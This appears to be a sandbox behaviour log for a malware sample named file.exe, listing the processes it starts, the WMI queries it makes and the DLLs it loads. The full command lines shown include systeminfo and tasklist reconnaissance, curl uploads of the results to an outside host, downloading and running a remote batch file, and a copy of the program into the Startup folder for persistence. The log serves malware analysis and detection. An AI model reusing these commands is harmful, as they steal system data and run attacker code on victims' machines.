Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4308:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2180:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5460:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5400:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4024:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3836:120:WilError_03
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\tmp.txtJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Users\user\AppData\Local\Temp\tmp.bat" > C:\Users\user\AppData\Local\Temp\tmp.txt
Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\AppData\Local\Temp\tmp.iniJump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: file.exeReversingLabs: Detection: 28%
Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c systeminfo > tmp.txt && tasklist >> tmp.txt
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865" -X POST -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\user\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
Source: C:\Windows\SysWOW64\curl.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865" -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 3" -Lo "C:\Users\user\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"
Source: C:\Windows\SysWOW64\curl.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c type "C:\Users\user\Desktop\file.exe" > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe"
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865" -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -Lo "C:\Users\user\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\curl.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Users\user\AppData\Local\Temp\tmp.bat" > C:\Users\user\AppData\Local\Temp\tmp.txt
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865" -X POST -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\user\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
Source: C:\Windows\SysWOW64\curl.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c systeminfo > tmp.txt && tasklist >> tmp.txt
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeProcess created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865" -X POST -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\user\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeProcess created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865" -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 3" -Lo "C:\Users\user\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"
Source: C:\Windows\SysWOW64\curl.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeProcess created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865" -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -Lo "C:\Users\user\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"
Source: C:\Windows\SysWOW64\curl.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Users\user\AppData\Local\Temp\tmp.bat" > C:\Users\user\AppData\Local\Temp\tmp.txt
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeProcess created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865" -X POST -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\user\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c systeminfo > tmp.txt && tasklist >> tmp.txtJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865" -X POST -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\user\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/" Jump to behavior
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865" -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 3" -Lo "C:\Users\user\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/" Jump to behavior
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c type "C:\Users\user\Desktop\file.exe" > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865" -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -Lo "C:\Users\user\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/" Jump to behavior
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe systeminfoJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c systeminfo > tmp.txt && tasklist >> tmp.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeProcess created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865" -X POST -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\user\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/" Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeProcess created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865" -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 3" -Lo "C:\Users\user\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/" Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeProcess created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865" -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -Lo "C:\Users\user\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/" Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Users\user\AppData\Local\Temp\tmp.bat" > C:\Users\user\AppData\Local\Temp\tmp.txt Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeProcess created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865" -X POST -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\user\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe systeminfoJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
